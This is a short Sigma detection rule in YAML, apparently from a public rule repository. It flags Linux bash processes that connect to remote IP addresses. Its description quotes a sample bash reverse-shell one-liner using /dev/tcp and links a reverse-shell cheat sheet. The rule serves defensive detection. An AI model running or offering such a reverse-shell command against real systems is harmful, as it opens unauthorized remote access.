Florian Roth
24 lines
709 B
YAML
24 lines
709 B
YAML
title: Linux Reverse Shell Indicator
|
|
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
|
|
status: experimental
|
|
description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
|
|
references:
|
|
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
|
|
date: 2021/10/16
|
|
author: Florian Roth
|
|
logsource:
|
|
product: linux
|
|
category: network_connection
|
|
detection:
|
|
selection:
|
|
Image|endswith: '/bin/bash'
|
|
filter:
|
|
DestinationIp:
|
|
- '127.0.0.1'
|
|
- '0.0.0.0'
|
|
condition: selection and not filter
|
|
falsepositives:
|
|
- Unknown
|
|
level: critical
|
|
|